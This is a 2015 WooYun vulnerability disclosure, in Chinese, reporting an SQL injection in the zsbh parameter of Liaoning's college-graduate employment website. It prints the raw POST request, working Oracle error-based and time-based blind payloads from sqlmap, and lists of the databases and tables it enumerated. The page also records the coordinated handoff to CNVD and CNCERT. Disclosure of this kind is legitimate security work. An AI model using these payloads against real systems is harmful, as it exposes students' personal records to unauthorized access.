当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145940

漏洞标题:辽宁省高校毕业生就业信息网存在SQL注入,可影响大批学生档案

相关厂商:cncert国家互联网应急中心

漏洞作者: xunnun

提交时间:2015-10-12 11:17

修复时间:2015-11-30 14:26

公开时间:2015-11-30 14:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

rt

详细说明:

POST /byzscx/result.jsp HTTP/1.1
Content-Length: 94
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: JSESSIONID=CCA85540142478428AC5287E772976F6.server99; voted_time=2015-10-6; CNZZDATA3061020=cnzz_eid%3D1623658040-1444484727-http%253A%252F%252F**.**.**.**%252F%26ntime%3D1444484727; looyu_id=c6ebf52265e02063df3ae0402f946a63b0_11267%3A1; looyu_11267=v%3Ac6ebf52265e02063df3ae0402f946a63b0%2Cref%3Ahttp%253A//**.**.**.**/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//**.**.**.**/monitor; _gscu_169170879=444847250368ki10; _gscs_169170879=44484725azwwiq10|pv:1; _gscbrs_169170879=1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Submit=%b2%e9%20%20%d1%af&xm=1&yzm=1&zsbh=*


zsbh参数存在注入

sqlmap identified the following injection point(s) with a total of 190 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: Submit=%b2%e9 %d1%af&xm=1&yzm=1&zsbh=' AND 8782=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(112)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (8782=8782) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'qDKo'='qDKo
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: Submit=%b2%e9 %d1%af&xm=1&yzm=1&zsbh=' AND 3820=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'rYwW'='rYwW
---
back-end DBMS: Oracle


back-end DBMS: Oracle
available databases [49]:
[*] CTXSYS
[*] DAGL
[*] DAGLBASE
[*] DJYXXGL
[*] DYGL
[*] ECMS22_APP_USER
[*] ECMS_APP_USER
[*] HR
[*] JOBNET
[*] LNJYOA
[*] LNJYYJS
[*] LNJYZZ
[*] LNSZ
[*] MARKET
[*] MDSYS
[*] NEWS
[*] NEWSUT
[*] OA42
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] OLDLNJYOA
[*] ORDSYS
[*] OUTLN
[*] PKSTZ
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] QZDJB
[*] RSGL2
[*] SCOTT
[*] SH
[*] SXPX
[*] SYS
[*] SYSTEM
[*] SZLJS
[*] TGJH
[*] VOTE
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XLRZ
[*] YCX
[*] ZSJY


选取其中一个数据库看看是否可查看表

back-end DBMS: Oracle
Database: LNJYZZ
[37 tables]
+----------------------+
| BAS_BYNF |
| BAS_BYNF_UNITE |
| COMBIN1 |
| CON_BASE |
| CON_SET |
| DM_ADMIN |
| MEMBERS |
| MOE_TASK_TABLE |
| PLAN_TABLE |
| RS_GWGLXX |
| RS_RYGWGL |
| RS_RYJBXX |
| RS_ZZJG |
| SEARCH_PART |
| SEARCH_PART_RELATE |
| SEARCH_TYPE |
| SERVERMSG |
| SJZD_FL |
| SJZD_LB |
| SJZD_XM |
| SWBDZBZ_CONDITION |
| SWBDZBZ_CON_STR |
| SYSTEM |
| SYSTEM_ROLE |
| SYSTEM_ROLE_FUNCTION |
| TABLE_MSG |
| TABLE_STRMSG |
| TMODE |
| TMODE_STR |
| T_DM |
| T_DM_HT |
| T_DM_TEMP |
| VALIDATOR_RULES |
| YXFP |
| YXFP_PERSON |
| YX_CERTIFY |
| YX_XX |
+----------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 xunnun@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-16 14:24

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价